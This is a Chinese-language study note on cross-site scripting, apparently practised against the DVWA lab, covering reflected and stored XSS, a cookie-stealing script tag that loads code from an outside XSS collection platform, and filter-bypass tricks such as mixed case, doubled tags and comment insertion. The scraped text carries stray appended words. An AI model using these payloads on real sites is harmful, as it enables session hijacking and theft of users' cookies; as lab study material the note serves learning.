第二轮学习笔记: XSS跨站脚本漏洞
扎头发,两圈太松,三圈太紧,洗澡,往左一点烫死,往右一点冻死,吃泡面,一桶吃不饱,两桶吃不完,就像咱们的关系。。。web
---- 网易云热评安全
跨站脚本***(XSS),恶意***者在web页面插入恶意script代码,当用户浏览该页面时,恶意代码就会被执行,达到***用户的目的。cookie
造成缘由:程序对输入和输出的过滤不严格xss
1、反射型XSS:须要欺骗用户本身点击连接才能出发XSS代码ide
一、在输入窗口输入123,点击提交,审查元素,能够看到提交的内容显示在了网页工具
二、在输入框输入:<script>alert('123')</script>,点击提交,弹出对话框,说明存在漏洞web安全
2、漏洞利用blog
一、找一个xss平台,注册帐号,新建一个项目ip
二、复制关键代码:<sCRiPt sRC=https://xss.wtf/ltkW></sCrIpT>,将该代码复制到存在漏洞的页面,而后提交it
三、打开xss平台上建立的项目,咱们能够获得DVWA平台登陆的cookie
3、存储型XSS:用户只要访问存在该漏洞的页面就会触发
一、在对话框输入<script>alert('123')</script>,提交,每次刷新页面都会弹出,说明该处存在xss漏洞
二、在对话框输入xss平台上生成的代码<sCRiPt sRC=https://xss.wtf/ltkW></sCrIpT>,点击提交,只要访问该页面的用户,都会在xss平台上看到他的cookie信息
4、xss绕过
一、大小写绕过,将<script>修改成<ScRipt>
二、双写绕过,将<script>修改成<Sc<script>Ript>
三、注释绕过,将<script>修改成<scri<!--aaa--->pt>
四、实体转换,将&改成&,将<改成<,将>改成>等等
禁止非法,后果自负
欢迎关注公众号:web安全工具库
- 1. 第二轮学习笔记:XSS跨站脚本漏洞
- 2. xss跨站脚本漏洞
- 3. XSS漏洞(跨站脚本)
- 4. 【第七章】XSS 跨站脚本漏洞
- 5. XSS跨站脚本漏洞 初学
- 6. 第二轮学习笔记:CSRF跨站请求伪造漏洞
- 7. XSS(跨站脚本)漏洞详解
- 8. 跨站点脚本(xss)解析(二)保存型xss漏洞
- 9. xss跨站漏洞
- 10. XSS(跨站脚本)漏洞详解之XSS跨站脚本攻击漏洞的解决
- 更多相关文章...
- • Swift 下标脚本 - Swift 教程
- • 服务端脚本 指南 - 网站建设指南
- • Tomcat学习笔记(史上最全tomcat学习笔记)
- • Kotlin学习(二)基本类型
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. No provider available from registry 127.0.0.1:2181 for service com.ddbuy.ser 解决方法
- 2. Qt5.7以上调用虚拟键盘(支持中文),以及源码修改(可拖动,水平缩放)
- 3. 软件测试面试- 购物车功能测试用例设计
- 4. ElasticSearch(概念篇):你知道的, 为了搜索…
- 5. redux理解
- 6. gitee创建第一个项目
- 7. 支持向量机之硬间隔(一步步推导,通俗易懂)
- 8. Mysql 异步复制延迟的原因及解决方案
- 9. 如何在运行SEPM配置向导时将不可认的复杂数据库密码改为简单密码
- 10. windows系统下tftp服务器使用
- 1. 第二轮学习笔记:XSS跨站脚本漏洞
- 2. xss跨站脚本漏洞
- 3. XSS漏洞(跨站脚本)
- 4. 【第七章】XSS 跨站脚本漏洞
- 5. XSS跨站脚本漏洞 初学
- 6. 第二轮学习笔记:CSRF跨站请求伪造漏洞
- 7. XSS(跨站脚本)漏洞详解
- 8. 跨站点脚本(xss)解析(二)保存型xss漏洞
- 9. xss跨站漏洞
- 10. XSS(跨站脚本)漏洞详解之XSS跨站脚本攻击漏洞的解决